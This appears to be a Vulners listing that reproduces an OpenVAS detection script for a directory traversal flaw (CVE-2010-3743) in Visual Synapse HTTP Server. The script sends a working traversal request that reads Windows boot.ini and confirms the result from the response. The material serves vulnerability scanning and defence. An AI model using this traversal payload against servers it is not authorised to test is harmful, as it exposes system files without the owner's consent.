Lucene search
K

Visual Synapse HTTP Server Directory Traversal Vulnerability

🗓️ 18 Oct 2010 00:00:00Reported by Copyright (c) 2010 Greenbone Networks GmbHType 
openvas
 openvas
🔗 plugins.openvas.org👁 40 Views

Visual Synapse HTTP Server Directory Traversal Vulnerability. Attackers can gain sensitive information about the remote system's directory contents due to input validation error in the server

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
Visual Synapse HTTP Server v1.0 RC3 Directory Traversal Vulnerability
8 Oct 201000:00
zdt
Tenable Nessus
EAServer <= 6.3.1 Multiple Vulnerabilities
3 Jul 201300:00
nessus
CVE
CVE-2010-3743
8 Oct 201020:00
cve
Cvelist
CVE-2010-3743
8 Oct 201020:00
cvelist
EUVD
EUVD-2010-3722
7 Oct 202500:30
euvd
NVD
CVE-2010-3743
8 Oct 201021:00
nvd
OpenVAS
wodWebServer.NET <= 1.3.3 Directory Traversal Vulnerability - Active Check
28 Mar 201100:00
openvas
OpenVAS
Visual Synapse HTTP Server Directory Traversal Vulnerability (2010) - Active Check
18 Oct 201000:00
openvas
Packet Storm
Visual Synapse Directory Traversal
8 Oct 201000:00
packetstorm
Prion
Directory traversal
8 Oct 201021:00
prion
Rows per page
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_vshttp_server_dir_traversal_vuln.nasl 5388 2017-02-21 15:13:30Z teissa $
#
# Visual Synapse HTTP Server Directory Traversal Vulnerability
#
# Authors:
# Antu Sanadi <[email protected]>
#
# Copyright:
# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

tag_impact = "Successful exploitation will allow attacker to launch directory
traversal attack and gain sensitive information about the remote system's
directory contents.

Impact Level: Application";

tag_affected = "Visual Synapse HTTP Server 1.0 RC3, 1.0 RC2, 1.0 RC1 and 0.60
and prior";

tag_insight = "An input validation error is present in the server which fails
to validate user supplied request URI containing 'dot dot' sequences (/..\).";

tag_solution = "No solution or patch was made available for at least one year
since disclosure of this vulnerability. Likely none will be provided anymore.
General solution options are to upgrade to a newer release, disable respective
features, remove the product or replace the product by another one.";

tag_summary = "This host is running Visual Synapse HTTP Server and is prone to
directory traversal vulnerability.";

if(description)
{
  script_id(801526);
  script_version("$Revision: 5388 $");
  script_tag(name:"last_modification", value:"$Date: 2017-02-21 16:13:30 +0100 (Tue, 21 Feb 2017) $");
  script_tag(name:"creation_date", value:"2010-10-18 15:37:53 +0200 (Mon, 18 Oct 2010)");
  script_cve_id("CVE-2010-3743");
  script_bugtraq_id(43830);
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_name("Visual Synapse HTTP Server Directory Traversal Vulnerability");
  script_xref(name : "URL" , value : "http://www.exploit-db.com/exploits/15216/");
  script_xref(name : "URL" , value : "http://www.syhunt.com/?n=Advisories.Vs-httpd-dirtrav");
  script_xref(name : "URL" , value : "http://www.securityfocus.com/archive/1/archive/1/514167/100/0/threaded");

  script_tag(name:"qod_type", value:"remote_vul");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (c) 2010 Greenbone Networks GmbH");
  script_family("Web Servers");
  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 80);
  script_tag(name : "impact" , value : tag_impact);
  script_tag(name : "affected" , value : tag_affected);
  script_tag(name : "insight" , value : tag_insight);
  script_tag(name : "solution" , value : tag_solution);
  script_tag(name : "summary" , value : tag_summary);
  script_tag(name:"solution_type", value:"WillNotFix");
  exit(0);
}


include("http_func.inc");
include("http_keepalive.inc");

vshttpsPort = get_http_port(default:80);
if(!vshttpsPort){
  exit(0);
}

## Construct the request
sndReq = string("GET / \r\n",
                "Host: ", get_host_name(), "\r\n\r\n");
rcvRes = http_keepalive_send_recv(port:vshttpsPort, data:sndReq);

## Confirm the Visual Synapse HTTP Server running
if("Visual Synapse HTTP Server" >< rcvRes)
{
  ##  Construct the Attack request
  attack = string("GET /..\\..\\..\\boot.ini HTTP/1.1\r\n",
                 "Host: ", get_host_name(), "\r\n\r\n");
  rcvRes = http_keepalive_send_recv(port:vshttpsPort, data:attack);

  ## Confirm the exploit
  if(egrep(pattern:"HTTP/.* 200 Ok", string:rcvRes) &&
    ("\WINDOWS" >< rcvRes) && ("boot loader"  >< rcvRes)){
    security_message(port:vshttpsPort);
  }
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Feb 2017 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.00115
40